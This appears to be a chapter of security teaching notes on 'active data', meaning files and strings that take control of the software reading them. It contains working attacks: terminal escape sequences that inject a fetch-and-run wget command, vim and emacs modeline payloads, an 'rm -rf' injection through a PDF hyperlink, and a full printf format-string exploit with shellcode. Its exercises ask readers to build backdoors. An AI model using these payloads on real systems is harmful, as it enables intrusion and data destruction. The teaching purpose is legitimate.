
5. Active data

One is inclined to think about data processing as having programs, the active parts, and data, the passive parts. Then it comes as a surprise that one can be attacked by data.

5.1 Nostalgia

The first time I created active data was in 1974 on a PDP-8 under OS/8. The command GET should read a binary tape or file, but not execute it. The command RUN would execute it. However, a suitably crafted papertape would take over control of the machine when read using the GET command. This was done taking advantage of an off-by-one error in the loader.

5.2 Terminals and terminal emulators

Text sent to a terminal is displayed there. Most terminals recognize command sequences embedded in the text. Common sequences select bold, blinking, underlined or half-bright text, and more recently also color. Other sequences ask the terminal to erase a line, scroll up, and so on. On the VT100 such special sequences mostly start with the ESC symbol, and hence they are known as "escape sequences".

But the traffic is bidirectional - one can ask a terminal for its model number or serial number, for a status, for the position of the cursor, for the contents of the current line, for the screen contents.

That is interesting. Send someone a letter with some embedded sequences. If she views it on her terminal, the sequences may activate terminal functions. Text sent back by the terminal itself is indistinguishable from commands typed by the user.

For example, on vt100 terminals the character 0232 or the combination ESC Z sends back the terminal ID, 1;2c on my xterm.

Programs like xterm often have powerful features. Old versions of xterm accept escape sequences that specify a log file, and ask to start logging to that file. But that means that anybody who manages to get his text printed on such a terminal can destroy a file of his choice - maybe even give it a chosen content. Current versions have this feature switched off by default. But so many features remain.

People usually set mesg n to inhibit writes to their terminal. Programs like write and talk must filter out escape sequences.
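What such a filter might look like can be sketched in C. This is only an illustration, not the code of write or talk: the function name sanitize_for_terminal is made up here, and treating bytes 0x80-0x9f as controls assumes a single-byte encoding such as Latin-1 (for UTF-8 text the test would have to be done after decoding).

```c
#include <stddef.h>

/* Copy src into dst (at most dstsize-1 bytes plus a NUL), replacing every
 * control byte with '?'.  Newline and tab are kept.  Bytes 0x80-0x9f are
 * treated as C1 controls, which assumes a single-byte encoding such as
 * Latin-1.  Returns the number of bytes replaced.
 * (Hypothetical helper, for illustration only.) */
size_t sanitize_for_terminal(const char *src, char *dst, size_t dstsize)
{
        size_t replaced = 0, n = 0;

        if (dstsize == 0)
                return 0;
        for (; *src != '\0' && n + 1 < dstsize; src++) {
                unsigned char c = (unsigned char)*src;
                int is_control = (c < 0x20 && c != '\n' && c != '\t')
                              || c == 0x7f
                              || (c >= 0x80 && c <= 0x9f);
                if (is_control) {
                        dst[n++] = '?';
                        replaced++;
                } else {
                        dst[n++] = (char)c;
                }
        }
        dst[n] = '\0';
        return replaced;
}
```

With this filter both the ESC that starts a sequence and the BEL that ends a title sequence are turned into question marks, so the remaining text is displayed as ordinary characters.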

There used to be all kinds of fun with terminals. For example, stty speed 0 < /dev/ttyN would set the baud rate of a given terminal to zero and log the user off.

Even when there is no security breach, funny sequences can cause a loss of time. One can iconify the window, change its size, lock (part of) it, change character set, make foreground and background colors equal, and do lots of other annoying things, so that it may take a non-expert a considerable amount of time to get back to normal. There may also be privacy concerns. On an xterm, the 3-symbol sequence ESC [ i sends the screen to the printer.

Exercise Play with xterm. What do the sequences ESC [ 2 t and ESC [ 3 ; 100 ; 0 t and ESC [ 4 ; 1 ; 1 t and ESC [ 2 1 t and ESC ] 2 ; h a c k e d BEL do? (Test by typing to cat or ed or so, or use echo, for example echo -e "\e]2;hacked\a".)

As a combination of the last two parts of this exercise, look at

echo -e "\e]2;;wget;sh .bd;exit;\a\e[21t\e]2;xterm\aPress Enter>\e[8m;"
The command to fetch a file with commands from some place on the net and execute it is stored in the window title bar. Then the window title bar is reported, and executed as soon as the user hits enter.

Exercise (H D Moore) What does echo -e "\eP0;0|0A/17\x9c" do?

Exercise Construct a filename so that echoing its name to an xterm window colours the background red.

Exercise Construct a filename so that echoing its name to an xterm window removes the line containing that name. A good name to use if one knows that the name of a program will be echoed in an error message to the console screen.

Exercise Design a short text file called README so that after the command cat README the xterm window does not show anything suspicious, but after the next command the machine is hacked (let us say, a file .rhosts is created that allows access to anyone).

5.3 Editors


The Unix editor ex (with "visual" variant vi) would accept the sequences ex:, ei:, vx: and vi: occurring in the first or last five lines of the file being edited, and interpret the rest of the line as a startup command. (Still in 4.2 BSD.) Later this behaviour was made conditional upon a variable modeline or modelines. This is still the situation on many systems that have some vi-clone.

One could do funny things, like setting the shell and tags programs to be used, so that the system would be compromised as soon as a shell escape was used. On other systems it was even easier, and commands could be invoked directly from the modeline via a shell escape. (Here a discussion from 2001.)

Recent systems either disable modelines, or enable them but disallow the most dangerous uses. Nevertheless similar bugs keep coming up - allowing embedded scripts in files is inherently unsafe.

Georgi Guninski gave the example (Dec 2002)

/* vim:set foldmethod=expr: */
/* vim:set foldexpr=confirm(libcall("/lib/","system","/bin/ls"),"ms_sux"): */

vim better than windoze
that later was upgraded to a worm. On my system the version
vim: foldmethod=expr
vim: foldexpr=libcall("/lib/","system","/bin/ls\ -l")

vim better than windoze
works better (and shows how to use commands with parameters).

Exercise Find whether this works in your vi, possibly after changing the settings for modeline or modelines. Construct a letter such that if the vi-using receiver replies to it a backdoor is left on his system.

In Dec 2004 the following was discovered:

% cat .vimrc
set modeline
filetype plugin on
% cat evil.vim
let a = system('echo "I was here" > /tmp/owned')
% cat test
vim: ft=../../../../../home/aeb/evil
% cat /tmp/owned
cat: /tmp/owned: No such file or directory
% vim test
% cat /tmp/owned
I was here

Clearly, any cautious user has set nomodeline in his .vimrc.

Note that in many contexts people have tried to restrict the use of files to "local" ones, forbidding absolute pathnames. Often such a restriction can be circumvented using ../.
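A lexical check that rejects both absolute names and ../ components could look as follows. This is a sketch only: the name is_contained_path is invented for this example and is not taken from vim or any other program, and a purely lexical test says nothing about symbolic links.

```c
#include <string.h>

/* Return 1 if name is a relative path with no ".." component, else 0.
 * (Hypothetical helper; lexical check only, symlinks are not resolved.) */
int is_contained_path(const char *name)
{
        const char *p = name;

        if (*p == '\0' || *p == '/')
                return 0;                       /* empty or absolute */
        while (*p != '\0') {
                size_t len = strcspn(p, "/");   /* length of this component */

                if (len == 2 && p[0] == '.' && p[1] == '.')
                        return 0;               /* would climb out */
                p += len;
                while (*p == '/')               /* skip separators */
                        p++;
        }
        return 1;
}
```

A filetype name like ../../../../../home/aeb/evil is rejected by this test, while a plain name like nroff is accepted.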


In a completely similar way, many files contain embedded strings intended to set emacs options. For example, many man page source files start out

.\" Hey Emacs! This file is -*- nroff -*- source.
Here the part between -*-'s defines the major mode, and can also contain variable settings. There can also be a Local Variables: part at the end of a file. For example, in the Linux kernel many files in the SCSI code part end with
 * Overrides for Emacs so that we follow Linus's tabbing style.
 * Emacs will notice this stuff at the end of the file and automatically
 * adjust the settings for this buffer only.  This must remain at the end
 * of the file.
 * ---------------------------------------------------------------------------
 * Local variables:
 * c-indent-level: 4
 * c-brace-imaginary-offset: 0
 * c-brace-offset: -4
 * c-argdecl-indent: 4
 * c-label-offset: -4
 * c-continued-statement-offset: 4
 * c-continued-brace-offset: 0
 * indent-tabs-mode: nil
 * tab-width: 8
 * End:
This feature can (and should!) be disabled, but enable-local-variables is often t by default. Set it to nil. Sometimes one has to use inhibit-local-variables. Set it to t. Sometimes there is an additional variable enable-local-eval that enables the more dangerous actions in a Local variables section.

Charles Howes gave the example

So there you are, reading along in some file that you found.
Just browsing away, when what happens, but some magic bit of
Local variables:
find-file-hooks: ((lambda ()
                           (goto-char 0)
                           (re-search-forward "^Local variables:$")
                           (let ((p (point)))
                             (re-search-forward "^End:$")
                             (let ((m (buffer-modified-p)))
                               (delete-region p (1+ (point)))
                               (setq p (point))
                               (insert "-- hi there, I'm toast. -- ")
                               (insert (or (buffer-file-name) "nil"))
                               (call-process-region p (point)
                                 "/bin/echo" t 0 nil
                                 "you" "are" "toast")
                               (set-buffer-modified-p m)
                      (kill-local-variable 'find-file-hooks))))
text buried in that buffer comes to life and runs an arbitrary
piece of code at you.

Have a nice day! 

(This works here. The known attacks in this style were fixed in emacs 21.3.)

Exercise Find whether this works in your emacs, possibly after changing the settings for enable-local-eval, enable-local-variables, inhibit-local-variables.

Windows macro viruses

Very similar things hold for the Microsoft world, where macro viruses have been seen since 1995. An MS Word or Excel document can have a macro section with Word.Basic commands. Arbitrary actions can be caused by just opening the document. Some ancient links: an early advisory, an early FAQ, Virus Encyclopedia, Macro Virus writing Tutorial Part 1, Part 2.

5.4 Formatters

Formatters use a formatting language. Sometimes this language allows one to invoke arbitrary commands.


Runoff was a text formatter. Unix had the typesetter version troff and the non-typesetter version nroff. GNU has groff. These days TeX has taken over (mostly because troff is proprietary I suppose - for myself I prefer troff), but troff is still widely used as man page formatter. Various versions have commands that will invoke arbitrary system programs (e.g. .sy cmd or .pso cmd). Thus, it may be dangerous to view man pages obtained from an unreliable source. On my current Linux system I see

% cat foo.1
.sy date
.pso ls
% man ./foo.1
<standard input>:2: .sy request not allowed in safer mode
<standard input>:3: .pso request not allowed in safer mode
% troff -U foo.1
Tue Apr 1 11:00:05 CEST 2003
x T ps
x res 72000 1 1
x init
That is, one has to ask for "unsafer" mode for these macros to take effect.

PostScript and PDF

A similar story. PostScript "pictures" are really programs. If such programs can execute arbitrary system commands, it is dangerous to look at PostScript files from untrusted sources. If your browser can display PostScript, then you lose as soon as you click on a link to a page that contains an evil picture.

And even if the viewer tries to restrict dangerous commands, it can be hit by a buffer overflow or syntax error. There is a long list of advisories concerning the handling of PostScript and PDF, the latest one today.

One can also insert bad strings into a PDF file, that cause a viewer like xpdf to emit an error message containing that bad string. If the viewer was invoked on an xterm then tricks discussed above apply: one can hit xterm with arbitrary escape sequences.

PDF files can also contain suitably constructed hyperlinks that can cause arbitrary code to be run when activated by the reader.

xpdf and hyperlinks

Let us look at some detail. First, what precisely does xpdf (my PDF viewer) do when one clicks a hyperlink? Maybe it calls a browser - the details depend on user settings. Some config file, like /etc/xpdfrc or .xpdfrc, can contain a line like

urlCommand     "netscape -remote 'openURL(%s)'"
telling what to do with this hyperlink. If there is no such line we get a message URI: ... on the xterm where we invoked xpdf.

Exercise Construct a PDF file with a hyperlink such that clicking that link (when urlCommand is not set) will set the xterm title bar to "-hacked-" and move the xterm window to some other place on the screen.

But things are more interesting when there is a urlCommand. It will be invoked as system(CMD &), that is, as sh -c 'CMD &'. (More precisely, single and double quotes in CMD will be replaced by %27 and %22, otherwise CMD is copied faithfully. The latest RedHat security fix also replaces back quotes by %60.) A urlCommand like the default one shown above (with the %s part enclosed in single quotes) is fairly safe. But many distributions have an unprotected %s. For example, RedHat 8.0 uses

urlCommand      "/usr/bin/xpdf-handle-url %s"

Make a LaTeX file with a hyperlink:

\href{prot:hyperlink with stuff, say, `rm -rf /tmp/abc`; touch /tmp/pqr}{\texttt{Click me}}
and invoke pdflatex to make a PDF file. Now look at it with xpdf, and click the link. The file /tmp/abc is removed and /tmp/pqr is created. (If there is a popup window telling that /usr/bin/xpdf-handle-url should be edited to teach it about the protocol prot:, hit enter in that window.) One can follow what happens using strace -f -e execve xpdf test.pdf or so. The sh -c '/usr/bin/xpdf-handle-url prot:hyperlink with stuff, say, `rm -rf /tmp/abc`; touch /tmp/pqr' invokes rm via the backquote construction, and touch since ; is a command separator.

We see that a security fix that removes backquotes does not suffice. The right fix is to write

urlCommand      "/usr/bin/xpdf-handle-url '%s'"
and to have an xpdf-handle-url that never exposes its $1 in another sh -c, as the RedHat 8.0 version does.
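For a program that builds a shell command itself and cannot rely on quotes having been replaced already, the single-quote protection can be sketched in C as below. The function name shell_quote is an assumption of this example, not part of xpdf. Not invoking sh at all, and passing the string as a single argument to one of the exec functions, avoids the problem altogether.

```c
#include <stddef.h>

/* Write a single-quoted copy of s to out so that sh treats it as one word.
 * Each embedded ' is written as '\'' (close quote, escaped quote, reopen).
 * Returns 0 on success, -1 if out is too small.
 * (Hypothetical helper, for illustration only.) */
int shell_quote(const char *s, char *out, size_t outsize)
{
        size_t n = 0;

        if (outsize < 3)                        /* need at least '' and NUL */
                return -1;
        out[n++] = '\'';
        for (; *s != '\0'; s++) {
                size_t need = (*s == '\'') ? 4 : 1;

                if (n + need + 2 > outsize)     /* keep room for ' and NUL */
                        return -1;
                if (*s == '\'') {
                        out[n++] = '\'';
                        out[n++] = '\\';
                        out[n++] = '\'';
                        out[n++] = '\'';
                } else {
                        out[n++] = *s;
                }
        }
        out[n++] = '\'';
        out[n] = '\0';
        return 0;
}
```

Inside single quotes the shell gives no special meaning to backquotes or semicolons, so a hyperlink containing `rm -rf /tmp/abc`; touch /tmp/pqr reaches the handler as plain text.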

Conclusion of this discussion: one can easily produce PDF files such that when these are viewed by xpdf on a current machine arbitrary commands are executed (with the permissions of the reader). I have not tried Acroread, but it is said that the same things hold there.

Exercise Construct a PDF file with a hyperlink such that clicking that link on a RedHat 8.0 system will create a .rhosts file with appropriate contents in the reader's home directory.

5.5 printf - format string exploits

The routine printf() provides more a method than an example. Its ordinary use is for formatted printing, as in printf("val=%d\n",val) or printf("Hello, world!\n"). The argument string is printed, except that some combinations involving % have a special meaning.

The example printf("Hello, world!\n") inspires people to write printf(s) where s is some string. But that has interesting effects when the user can influence the string that is printed, making sure that it contains active data.

Let us write the program echo.c.

#include <stdio.h>

int main(int argc, char **argv) {
        int i;

        for (i = 1; i < argc; i++) {
                if (i > 1)
                        printf(" ");
                printf(argv[i]);        /* argument passed as the format string */
        }
        printf("\n");
        return 0;
}

Seems straightforward, and it works. Or, does it?

% ./echo Goodbye SCO!
Goodbye SCO!
% ./echo Ach %d %s
Ach -1073744428 h÷¿o÷¿s÷¿v÷¿
% ./echo "%08x %08x %08x %08x %08x"
bffff5d4 bffff588 4015afd8 40018420 00000001
% ./echo "%s %s %s %s %s"
Segmentation fault

If the string contains a percent-something combination then the required argument is fetched from the stack, and we print garbage or crash. We understand the crash: the value 00000001 is used as the address of a string to print, but there is nothing there. Let us try to understand the garbage.
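For comparison, a version without the flaw passes the user's strings as data to a constant format. The sketch below collects the arguments in a buffer so that the result can be inspected; the function name join_args is made up for this example.

```c
#include <stdio.h>

/* Join argv[1..argc-1] with single spaces into buf.  The user-supplied
 * strings are passed as data to the constant format "%s%s", so any % in
 * them is copied literally.  Returns 0 on success, -1 on truncation.
 * (Hypothetical helper, for illustration only.) */
int join_args(char *buf, size_t size, int argc, char **argv)
{
        size_t used = 0;
        int i;

        if (size == 0)
                return -1;
        buf[0] = '\0';
        for (i = 1; i < argc; i++) {
                int n = snprintf(buf + used, size - used, "%s%s",
                                 i > 1 ? " " : "", argv[i]);

                if (n < 0 || (size_t)n >= size - used)
                        return -1;              /* error or truncated */
                used += (size_t)n;
        }
        return 0;
}
```

In a program that prints directly, the same effect is obtained with printf("%s", s) or fputs(s, stdout) instead of printf(s).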

When printf() prints the string, the stack has the local variables of printf(), the saved frame pointer, the return address, and the parameters of printf() - in this case the format string. Try to get at the format string by using a longer format string. Typing lots of %08x gets boring. Use perl to do that for us.

(For perl, . is concatenation, and x repeats the preceding string the indicated number of times. For example, "%08x %08x %08x %08x " can be written as "%08x "x4.)

% FMT=`perl -e 'print ((("%08x "x8)."\n")x6)'`; ./echo "$FMT"
bffff4f4 bffff4a8 4015afd8 40018420 00000001 bffff4c8 40040d17 00000002 
bffff4f4 bffff500 40018ba0 00000002 08048280 00000000 080482a1 0804833c 
00000002 bffff4f4 080483b0 08048410 4000d930 bffff4ec 00000000 00000002 
bffff67c bffff683 00000000 bffff779 bffff792 bffff7e7 bffff7f7 bffff829 
bffff838 bffff85f bffff86a bffff875 bffff885 bffff896 bffff8a4 bffff8c0 
bffff8d2 bffff8e5 bffff900 bffff909 bffffbca bffffbe3 bffffc03 bffffc11 
The stack grows downward from 0xc0000000 and hence pointers to the stack tend to look like 0xbfff..... All those pointers to the stack at the end of the above list are environment pointers:
% FMT=`perl -e 'print (((("%08x "x8)."\n")x3).("%08x "x3)."%s\n"x2)'`; ./echo "$FMT"
bffff554 bffff508 4015afd8 40018420 00000001 bffff528 40040d17 00000002 
bffff554 bffff560 40018ba0 00000002 08048280 00000000 080482a1 0804833c 
00000002 bffff554 080483b0 08048410 4000d930 bffff54c 00000000 00000002 
bffff6e2 bffff6e9 00000000 LESSKEY=/etc/lesskey.bin
Below the environment pointers we see argc (2) and the list of (the two) arguments of the ./echo "$FMT" invocation, terminated by NULL.
% FMT=`perl -e 'print (((("%08x "x8)."\n")x3)."%s\n"x2)'`; ./echo "$FMT"
bffff564 bffff518 4015afd8 40018420 00000001 bffff538 40040d17 00000002 
bffff564 bffff570 40018ba0 00000002 08048280 00000000 080482a1 0804833c 
00000002 bffff564 080483b0 08048410 4000d930 bffff55c 00000000 00000002 
%08x %08x %08x %08x %08x %08x %08x %08x 
%08x %08x %08x %08x %08x %08x %08x %08x 
%08x %08x %08x %08x %08x %08x %08x %08x 
Yes, precisely as expected. We can find the format string on the stack, with the closing NUL byte at address 0xbffff778 and a starting address that depends on its length. (Above the starting address was bffff6e9 with a string of length 143.)

The program itself lives around 08048000:

% nm ./echo | grep -w main
0804833c T main
so numbers like 08048280, 080482a1, 0804833c, 080483b0, 08048410 are probably program addresses.

Write to memory

Can such a printf format flaw be exploited?

Read the printf(3) manual page. We encounter %n:

    n      The number of characters written so far is stored into the
           integer indicated by the int * pointer argument.
Interesting. One can write to a given address. The value written to that address is the number of bytes printed so far, and we have easy control over that: one can put lots of padding in the format string, or, easier, use formats like %73x to print numbers with any predetermined amount of padding. So, any (not too large) number above some lower bound can be written via %n. It remains to get control over the address written to.
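The legitimate use of %n is easily tried out. In the sketch below (the function name count_after_padding is invented here) the format is a constant and the pointer is supplied by the program, so nothing is being exploited. Some hardened C libraries restrict or reject %n, so this may not work everywhere.

```c
#include <stdio.h>

/* Return the value that %n stores after one number has been printed
 * in a field of the given width (width should stay below 512).
 * (Hypothetical helper, for illustration only.) */
int count_after_padding(int width)
{
        char buf[512];
        int n = -1;

        /* %*d takes the field width from the argument list; %n then
         * stores the number of characters produced so far into n. */
        snprintf(buf, sizeof buf, "%*d%n", width, 0, &n);
        return n;
}
```

Calling count_after_padding(73) stores 73: the padding alone determines the value written.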

First read a bit more in printf(3). It says

     By default, the arguments are used in the order given, where
     each `*' and each conversion specifier asks for the next argument.
     One can  also  specify  explicitly which argument is taken,
     by writing `%m$' instead of `%' and `*m$' instead of `*', where
     the decimal integer m denotes the position in the argument list.
(There is more text there, and we'll violate the rules, but it works.)
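A small sketch of this notation in ordinary use, assuming a C library that supports the POSIX %m$ extension (glibc does); the function name swapped is made up for the example.

```c
#include <stdio.h>

/* Format two strings in swapped order using POSIX positional arguments.
 * Returns what snprintf returns: the length of the full result.
 * (Hypothetical helper, for illustration only.) */
int swapped(char *buf, size_t size, const char *first, const char *second)
{
        /* %2$s selects the second argument after the format, %1$s the first. */
        return snprintf(buf, size, "%2$s %1$s", first, second);
}
```

Here every argument is used and all conversions are numbered, as the manual page requires. A format like %25$s on its own skips the first 24 arguments, which is the rule violation mentioned above.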

That simplifies matters. We can use this in the format to jump immediately to the desired place. As a test, let us find program name and format again on the stack.

% ./echo '%25$s %26$s'
./echo %25$s %26$s
As expected. Now overwrite the program name with an exclamation mark.

% ./echo '%25$33s%25$n %25$s'
                           ./echo !
Look what happened. First we print the program name padded with spaces, in a field of width 33. Then we write the number of symbols written so far (that is, 33, the ASCII code for !) to the place where the program name was found earlier. Four bytes are written, in little-endian order, 0x21, 0, 0, 0, and the first two of these form the string "!" that is printed now.

So it works. We can overwrite memory with a given value. But the address written to was found only because there happened to be a pointer to it on the stack. In order to write to arbitrary addresses we must have arbitrary pointers on the stack, and can create them since the format string is found on the stack.

Where is this format string? Dump a larger fraction of the stack.

% FMT=`perl -e 'print ((("%08x "x8)."\n")x16)'`; ./echo "$FMT"
bffff354 bffff308 4015afd8 40018420 00000001 bffff328 40040d17 00000002 
bffff354 bffff360 40018ba0 00000002 08048280 00000000 080482a1 0804833c 
00000002 bffff354 080483b0 08048410 4000d930 bffff34c 00000000 00000002 
bffff4e2 bffff4e9 00000000 bffff779 bffff792 bffff7e7 bffff7f7 bffff829 
bffff838 bffff85f bffff86a bffff875 bffff885 bffff896 bffff8a4 bffff8c0 
bffff8d2 bffff8e5 bffff900 bffff909 bffffbca bffffbe3 bffffc03 bffffc11 
bffffc1c bffffc2a bffffc3e bffffc51 bffffcff bffffd08 bffffd2a bffffd3f 
bffffd53 bffffd6f bffffd7a bffffde8 bffffdf0 bffffdff bffffe1d bffffe2a 
bffffe49 bffffe5c bffffe81 bffffea2 bffffead bffffec6 bffffed2 bffffede 
bfffff07 bfffff1f bfffff45 bfffff78 bfffff85 bfffffa2 bfffffb7 bfffffcf 
bfffffdb bfffffec 00000000 00000020 ffffe400 00000021 ffffe000 00000010 
0183f9ff 00000006 00001000 00000011 00000064 00000003 08048034 00000004 
00000020 00000005 00000006 00000007 40000000 00000008 00000000 00000009 
08048280 0000000b 000001f4 0000000c 000001f4 0000000d 00000064 0000000e 
00000064 00000017 00000000 0000000f bffff4dd 00000000 00000000 00000000 
00000000 00000000 38366900 2f2e0036 6f686365 38302500 30252078 25207838 
Yes. The format repeats the bytes %08x , that is, 0x25, 0x30, 0x38, 0x78, 0x20, starting from 0xbffff4e9, closing NUL at 0xbffff778. Here argument 126 is 0x38302500, that is, the closing NUL of the program name, and the first three bytes of the format. And argument 127 is 0x30252078, the next four bytes of the format.
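Reading such a dump means turning each word back into the bytes it occupies in memory. A minimal sketch for a little-endian machine like the i386 used here (the function name word_to_bytes is invented for this example):

```c
#include <stdint.h>

/* Store the four bytes of w in the order they occupy in memory on a
 * little-endian machine such as i386: least significant byte first.
 * (Hypothetical helper, for illustration only.) */
void word_to_bytes(uint32_t w, unsigned char out[4])
{
        int i;

        for (i = 0; i < 4; i++)
                out[i] = (unsigned char)(w >> (8 * i));
}
```

For argument 126, the word 0x38302500 gives the bytes 0x00, 0x25, 0x30, 0x38, that is, a NUL followed by the characters %08.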

Life is simpler when the format string starts at an address divisible by 4, so in this example we must give it a length that is 0 (mod 4). (Note that the sh backquote construction trims trailing newlines, so that the format in this last example has length 655.)

For example,

% ./echo 'AAAABB %124$08x %125$08x'
AAAABB 41414141 25204242
Here the string has length 24, divisible by 4, and 124 words from top-of-stack the AAAA is seen. This number 124 varies a little with the length of the format string (mod 16) due to alignment effects. Let us only work with formats of a length divisible by 16, then the format starts at word 126:

% ./echo 'ABCDXXX %126$08x'
ABCDXXX 44434241

Try to overwrite the program name with "Hoi!". That is, we want bytes 0x48, 0x6f, 0x69, 0x21, 0 (decimal 72, 111, 105, 33, 0) at some address like 0xbffff4e2. Using %n we can write four bytes, but the value written is the number of bytes output so far, and 0x21696f48 is too large, so it must be written one byte at a time. Do four writes, to increasing addresses. Each write creates the byte we want but overwrites the next three bytes with NULs.

If we make a format string of length 64, then it will start at 0xbffff738, and the program name will start at 0xbffff731.

% FMT=`perl -e 'print "\x31\xf7\xff\xbf\x32\xf7\xff\xbf\x33\xf7\xff\xbf\x34\xf7\xff\xbf%56d%126\x24n%39d%127\x24n%250d%128\x24n%184d%129\x24n\x0a%25\x24s"'`
% ./echo "$FMT"
1÷¿2÷¿3÷¿4÷¿                                             -1073744476                            -1073744552                                                                                                                                                                                                                                                1075163096                                                                                                                                                                              1073841184
Hoi!
Explanation: the part \x31\xf7\xff\xbf stores 4 bytes that together form the address 0xbffff731. Then \x32\xf7\xff\xbf forms 0xbffff732. Etc. Four addresses start the format string, ready to be accessed via %126$n, %127$n, etc. Here the dollar sign is coded as \x24 to prevent expansion as shell variable. In order to write the desired values via these %n pointers, we have to print some bytes. That is the purpose of the %56d etc. parts of the format. Finally, the %25$s prints the program name, verifying that we succeeded in writing "Hoi!" there. The \x0a is a newline, making sure that "Hoi!" appears on a new line after the garbage line.

This means that we have complete control over the program. We can make it exec a shell and get remote access if this was a remote program, or get root access if this was a setuid root program.


Very small field widths will fail: printing 666 with format %2d takes 3 positions, not 2. The worst case with a decimal signed format may be -2147483648 which takes 11 positions. So, one should use %258d instead of %2d (etc.) so as to avoid this problem. Or one can use %2c instead, where that is supported.
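The field widths used in the "Hoi!" example can be computed mechanically. The sketch below assumes that each padded field prints exactly as many characters as its width, which is why widths below a chosen minimum are increased by 256. The function name padding_widths and its parameters are made up for this example.

```c
#include <stddef.h>

/* For each wanted byte, compute a field width that brings the running
 * output count to that value modulo 256.  Widths below min_width are
 * increased by 256, since a number may not fit in a narrower field.
 * start is the number of bytes printed before the first padded field.
 * (Hypothetical helper, for illustration only.) */
void padding_widths(unsigned start, unsigned min_width,
                    const unsigned char *want, size_t n, unsigned *width)
{
        unsigned count = start;
        size_t i;

        for (i = 0; i < n; i++) {
                unsigned w = (want[i] + 256u - count % 256u) % 256u;

                while (w < min_width)
                        w += 256;
                width[i] = w;
                count += w;             /* bytes output so far */
        }
}
```

With start 16 (the four addresses at the beginning of the format), minimum width 11 and the bytes of "Hoi!", this yields 56, 39, 250 and 184, the widths used in the format string above.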


For an exploit it suffices to overwrite a single memory location with a single value. The memory location will be one that holds a return address, or the address of a function that is going to be called. The single value will be the address of a function that we would like to call instead.

A concrete setup can be the following:

1. Put shellcode in the environment:

% SHELLCODE=`perl -e 'print "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"'`
% export SHELLCODE
(This modifies the environment, and changes all addresses found above, so should have been done at the start.)

1a. Find the address of the shellcode. Maybe with a tiny program like

#include <stdio.h>
#include <stdlib.h>

int main(int ac, char **av) {
        while (--ac > 0) {
                char *p = getenv(*++av);        /* NULL if the variable is unset */
                printf("%p\n", (void *)p);
        }
        return 0;
}
Give this tiny program a name of the same length as that of the program we want to exploit (increasing the length of the program name by 1 decreases the address of environment variables by 2), and ask for the address:
% ./addr SHELLCODE

2. Find the address of the destructor table of the program.

% nm ./echo | grep DTOR
08049580 d __DTOR_END__
0804957c d __DTOR_LIST__

Now write the address of the shellcode, that is, 0xbffff837 to the address 0x08049580. When the program exits, its destructors will be called and our shellcode is executed.

Cleaned environment

Some security-conscious programs remove all environment variables except perhaps for a few known ones. If one cannot store a string in the environment, the string can be one of the program parameters. If the program does not allow that, one can create a link to the program so that the exploit string becomes the name of the program.

Exploit examples

Maybe the first exploit of this type was the wu-ftpd exploit (published June 2000, one of the exploits given there is dated 15-10-1999). Study the code!

When people started looking for such vulnerabilities, these were found all over the place. An xlock exploit. An rpc.statd exploit. An LPRng exploit. These were root exploits. Here a PHP exploit that gives one the rights of the invoker, probably httpd.


Many variations on this theme are discussed on the web. A good reference to these exploits is this 2001 writeup. See also the notes by Frédéric Raynal and Kalou.
